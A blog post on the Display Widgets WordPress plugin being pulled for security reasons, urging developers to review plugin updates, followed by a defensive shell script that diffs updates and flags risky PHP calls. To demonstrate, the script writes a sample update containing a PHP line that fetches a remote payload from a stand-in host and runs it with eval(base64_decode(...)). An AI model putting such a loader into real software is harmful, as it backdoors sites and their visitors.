Plugin Pulled Due to Security Risk
Today’s topic is for anyone in the web design/development industry, as well as for the more casual website builder. This article, written earlier today, is very important. It discusses a popular WordPress plugin called Display Widgets. It’s quite a lengthy read for the typical blog entry, but it is well worth the time. Please read it via this link to WordFence’s blog, then tab back here for my take on the matter.
My Thoughts Regarding Plugin Dangers
Incidents like this can seriously damage both your reputation and your faith in the open source world in general. Many very useful tools exist out there, but using them comes with a certain level of responsibility you must accept first. If you have used any open source plugin or tool like this one to build out client sites, you owe it to yourself, and to your clients, to make sure that what you use is completely secure and that you are familiar with any behind-the-scenes functionality.
Whether you use WordPress, another design platform, or write custom code from scratch, this still applies. I strongly recommend that every person putting up a website fully understand the code they are using before they publish. Additionally, make sure you know what updates to that code actually do before installing them. It is not enough to rely on positive reviews to decide what is safe to deploy on a site. Too many people use tools they don’t completely understand and are then caught off guard when something like this happens.
You should always tell clients that they are taking risks when they blindly accept updates to their site after completion. Keeping your website up to date is always good practice, but not understanding what an update does is extremely risky. This is why I recommend that clients buy a regular maintenance package, and why I try to keep the price of such packages as reasonable as possible.
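As a concrete illustration of "know what an update does before installing it", here is an added example script (mine, not from the post or the plugin's authors) that unpacks an update next to the installed copy, prints the diff, lists files the update adds, and counts added lines that call functions worth a closer look. The plugin directories, their file contents, and the function names `plugin_update_diff`, `count_risky_additions` and `list_new_files` are all constructed for the demo; the pattern list is an assumption you should extend with your own checklist.

```shell
#!/bin/sh
# Added example (not from the original post): compare an installed plugin
# directory against the unpacked update before copying it into wp-content,
# and flag added lines that call functions a reviewer should look at by hand.
# Directories, file contents and the pattern list are constructed for the
# demo; in real use point INSTALLED and UPDATE at the live plugin and the
# freshly downloaded release.
set -u

WORK=$(mktemp -d)
INSTALLED="$WORK/installed/display-widgets"   # constructed stand-in for the live copy
UPDATE="$WORK/update/display-widgets"         # constructed stand-in for the new release
mkdir -p "$INSTALLED" "$UPDATE"

# Constructed sample: the installed copy has a single harmless file.
cat > "$INSTALLED/display-widgets.php" <<'EOF'
<?php
/* Plugin Name: Display Widgets (constructed sample) */
function dw_render($w) { return esc_html($w); }
EOF

# Constructed sample update: the same file plus a new file that pulls in
# and runs remote code. This is the kind of change a review must catch.
cp "$INSTALLED/display-widgets.php" "$UPDATE/display-widgets.php"
cat > "$UPDATE/geolocation.php" <<'EOF'
<?php
$r = wp_remote_get('http://example.invalid/payload');
eval(base64_decode($r['body']));
EOF

# Hypothetical helper: unified diff of installed copy vs update.
# diff exits 1 when files differ; that is expected, so normalise to 0.
plugin_update_diff() {
    diff -ruN "$1" "$2" 2>/dev/null
    return 0
}

# Hypothetical helper: count added lines (diff '+' lines, excluding the
# '+++' file header) that match the assumed list of risky PHP calls.
count_risky_additions() {
    plugin_update_diff "$1" "$2" \
      | grep '^+' | grep -v '^+++' \
      | grep -cE 'eval\(|base64_decode\(|wp_remote_get\(|file_get_contents\(|system\(|exec\(' \
      || true
}

# Hypothetical helper: files present in the update but not in the installed copy.
list_new_files() {
    (cd "$1" && find . -type f | sort) > "$WORK/old.txt"
    (cd "$2" && find . -type f | sort) > "$WORK/new.txt"
    comm -13 "$WORK/old.txt" "$WORK/new.txt"
}

RISKY=$(count_risky_additions "$INSTALLED" "$UPDATE")
echo "New files in update:"
list_new_files "$INSTALLED" "$UPDATE"
echo "Risky added lines: $RISKY"
if [ "$RISKY" -gt 0 ]; then
    echo "Read the full diff before installing this update:"
    plugin_update_diff "$INSTALLED" "$UPDATE"
fi
```

The count is only a prompt to read the diff; a clean count does not make an update safe, and a non-zero count does not prove it is malicious. The point is that the reviewer sees every added file and every added line before anything lands on the client's site.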